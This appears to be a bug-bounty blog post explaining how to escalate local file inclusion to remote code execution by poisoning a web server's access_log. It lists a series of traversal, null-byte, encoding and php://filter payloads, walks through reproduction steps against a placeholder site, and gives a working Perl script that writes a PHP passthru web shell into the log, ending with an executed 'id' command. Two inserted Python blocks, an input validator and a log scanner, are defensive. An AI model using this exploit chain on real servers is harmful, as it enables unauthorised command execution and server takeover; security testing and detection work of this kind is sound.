LFI to RCE by injecting access_log
Hello Everyone,
Today I want to share a trick for escalating “Local File Inclusion/File Path Traversal to Remote Code Execution” by injecting the access_log, which has a critical impact.
What is LFI? Local File Inclusion is a vulnerability in some web applications: the site reads files from the server based on user input, and the developer doesn’t filter that input because he trusts the users :D.
What is RCE? Remote Code Execution is a bug that gives the attacker the ability to execute commands on the server.
For example, when you test a website and find a Local File Inclusion (LFI), that is good, but this issue only gives you access to files on the server. You will get a decent bounty for it, but if it is a Remote Code Execution (RCE) the bounty will be awesome. Now, every server has log files; these files save every request to the website, with the path and User-Agent and sometimes the Referer value. We will use the access.log file; you just need to brute-force the path of this file or of any other log file.
The following content describes the various methods and types, based on my current knowledge, that might be useful when expanding an LFI.
[1] Basic LFI Payload :
http://xyz.com/index.php?page=../../../../../../../../../etc/passwd
[2] NullByte Injection:
http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%00
[3] NullByte Injection with URL Encoding:
http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%2500
[4] Simple URL Encoding:
http://xyz.com/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
[5] Double URL Encoding:
http://xyz.com/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
[6] Base64 Encoded:
http://xyz.com/index.php?page=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
[7] Filter Evasion-1:
http://xyz.com/index.php?page=../\../\../\../\../\../\../\etc/passwd
[8] Filter Evasion-2:
http://xyz.com/index.php?page=..\/..\/..\/..\/..\/..\/..\/etc/passwd
[9] Filter Evasion-3:
http://xyz.com/index.php?page=....//....//....//....//....//etc/passwd
LFI [ PHP wrappers ] Payloads:-
[10] Simple PHP Filter:
http://xyz.com/index.php?page=php://filter/resource=/etc/passwd
[11] PHP ROT-13 Encoded Filter:
http://xyz.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd
[12] PHP Base-64 Encoded Filter:
http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
[13] PHP Base-64 Encoded Filter (Case Insensitive):
http://xyz.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=/etc/passwd
[14] PHP Filters (In Terms of Directory Traversal):
http://xyz.com/index.php?page=php://filter/resource=../../../etc/passwd
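As an added example that is not part of the original post, here is a Python check a defender can run on the “page” parameter before it reaches include(): it peels the encodings from the payload list above (URL, double URL, base64, null byte, backslash and ....// variants), reports why a value is unsafe, and then resolves the request only against an allowlist of known pages. The allowlist names are assumed.

```python
import base64, binascii, re
from urllib.parse import unquote

ALLOWED_PAGES = {"aboutus", "home", "contact"}   # assumed site pages
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # php://, etc.
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def decode_layers(value, max_rounds=3):
    """Peel single and double URL encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def base64_path(value):
    """Return the decoded text if value is base64 hiding a path, else None."""
    if not B64_RE.fullmatch(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() and "/" in text else None

def classify_page_param(raw):
    """List why a 'page' value is unsafe; an empty list means it is a plain name."""
    reasons, value = [], decode_layers(raw)
    if "\x00" in value:                      # %00 and %2500 truncation tricks
        reasons.append("null byte")
        value = value.replace("\x00", "")
    hidden = base64_path(value)
    if hidden is not None:                   # Li4vLi4v... style payloads
        reasons.append("base64-wrapped path")
        value = hidden
    if WRAPPER_RE.match(value):              # php://filter and other wrappers
        reasons.append("stream wrapper")
    # ../\ , ..\/ and ....// all leave a dots-only segment once \ is a separator
    segments = value.replace("\\", "/").split("/")
    if any(len(s) >= 2 and set(s) == {"."} for s in segments):
        reasons.append("traversal")
    return reasons

def resolve_page(raw):
    """Mitigation: map the request to a known page or reject it outright."""
    if classify_page_param(raw):
        return None
    return raw if raw in ALLOWED_PAGES else None
```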
So, Let’s Start with an Example:
I have a target, “http://xyz.com/index.php?page=aboutus”, and it’s vulnerable to LFI/FPT.
Steps to reproduce:-
Step 1: Enter the following URL in the Address bar of the browser:
http://xyz.com/index.php?page=aboutus
Step 2: Append the following basic LFI payload to the “page” parameter in the URL:
../../../../../../../../../../../../../../../etc/passwd
Note: the basic LFI payload didn’t work.
Step 3: As the basic LFI payload didn’t work, we will now try the “NullByte Injection” payload, as shown below.
../../../../../../../../../../../../../../../etc/passwd%00
This confirmed that the LFI was there. So now my target was to escalate it to get RCE.
Now the idea was to get access to some file, maybe a log file, that contains user-controlled input (in order to run a command).
Step 4: Now you have to search for log files. To find the log file locations you need to find httpd.conf first.
So, by searching manually or with an automated scan, e.g. Intruder, we have to look for “httpd.conf”.
Here we found the httpd.conf path, e.g. “/etc/httpd/conf/httpd.conf%00”; now paste this into the “page” parameter in the URL. This is shown in the screenshot below.
View source (Ctrl+U) for a better view of their httpd.conf.
So I tried reading the access logs and error logs at the different locations listed there.
Step 5: Now, after some minutes of searching and reading log files, I found something like “access_log”, which is what I wanted. So I tried reading that access log, as shown below.
http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00
Step 6: Now we have to search for the word “v0pcr3w” (the marker of the Remote Code Execution web shell) in “access_log”. In my case no word like “v0pcr3w” was found in “access_log”.
So now we have to inject the “access_log”. Below is the Perl script used to inject the access_log, or you can download it here.
#!/usr/bin/perl -w
# Sends one HTTP request whose path carries a PHP snippet, so the web server
# writes that snippet into its access_log. Usage: perl Inject_Log.pl <host> <port>
use IO::Socket::INET;
my $host = $ARGV[0];
my $port = $ARGV[1];
die "Usage: $0 <host> <port>\n" unless defined $host && defined $port;
print "*** Injecting $host:$port access log...\n";
# The snippet reads ?cmd= and runs it with passthru(); "v0pcr3w" is the marker used to find the line later.
my $rce = "<?if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
my $sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp") || die "Can't connect to $host:$port!\n";
print $sock "GET /v0pcr3w ".$rce." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);
print "*** Done!\n\n";
Now the point is, how do we inject the script? For that, below are the steps to install Perl and inject the script into access_log:
- Install Perl in your environment.
- Save the above Perl script as “Inject_Log.pl”.
- Now run it as “perl Inject_Log.pl <target> 80”, as shown in the following screenshot.
Step 7: If the Perl script ran successfully, open the access_log again and search for “v0pcr3w”. If the word is there, we’ve successfully injected the access_log. This is shown in the screenshot below.
Step 8: Now use the line below to execute a command on the server:
“/home/pro_99/xyz.com/access_log%00&cmd=id”, and you’ll see the “id” command executed.
So, enter the following final URL in the address bar of the browser and hit Enter:
http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00&cmd=id
BOOM!…………
Our command executed successfully: “GET /v0pcr3w uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)”. This is shown in the screenshot below.
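As an added example, not from the original post, here is a Python scan over Apache combined-format access_log lines that flags both halves of this attack from the defender’s side: a request whose path, Referer or User-Agent contains PHP code (the poisoning step), and a request that tries to include() a log file through the traversal bug (the execution step). The sample log lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format. Apache escapes embedded quotes, so [^"]* is safe.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Anything PHP would execute if this log line were ever include()d.
PHP_CODE_RE = re.compile(
    r"<\?(php|=)?|\b(passthru|system|shell_exec|exec|eval)\s*\(|\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
# The second stage: a request asking the app to include a log file.
LOG_TARGET_RE = re.compile(r"(access|error)[_.]log", re.IGNORECASE)

# Constructed sample lines mirroring the write-up; IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /v0pcr3w <?passthru($_GET[cmd]);?> HTTP/1.1" 400 0 "-" "-"
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../home/pro_99/xyz.com/access_log%00&cmd=id HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?page=aboutus HTTP/1.1" 200 2048 "http://xyz.com/" "<?php passthru($_GET[cmd]); ?>"
192.0.2.5 - - [10/Oct/2023:13:58:00 +0000] "GET /index.php?page=aboutus HTTP/1.1" 200 2048 "http://xyz.com/" "Mozilla/5.0"
"""

def scan_access_log(text):
    """Return (line_no, client_ip, finding) for poisoned lines and include attempts."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            findings.append((n, "?", "unparseable line"))
            continue
        # Stage 1: PHP code landed in a logged field (request line, Referer, User-Agent).
        for field in ("req", "ref", "ua"):
            if PHP_CODE_RE.search(m[field]):
                findings.append((n, m["ip"], f"php code in {field}"))
        # Stage 2: traversal or null byte pointed at a log file via the page parameter.
        decoded = unquote(m["req"])
        if LOG_TARGET_RE.search(decoded) and ("../" in decoded or "\x00" in decoded):
            findings.append((n, m["ip"], "log file include attempt"))
    return findings

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(*finding)
```

A hit on stage 1 alone is the moment to rotate the poisoned log out of any path the application can read; a stage 2 hit from the same client is the execution attempt itself.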
I hope this post helps someone; thank you for reading.
Suggestions are most welcome as always. I will keep posting security-related findings. If you got anything from it, you can press the clap icon below, and don’t forget to follow me on LinkedIn and Twitter as well. See you all next time. :)
Happy hacking!
Cheers!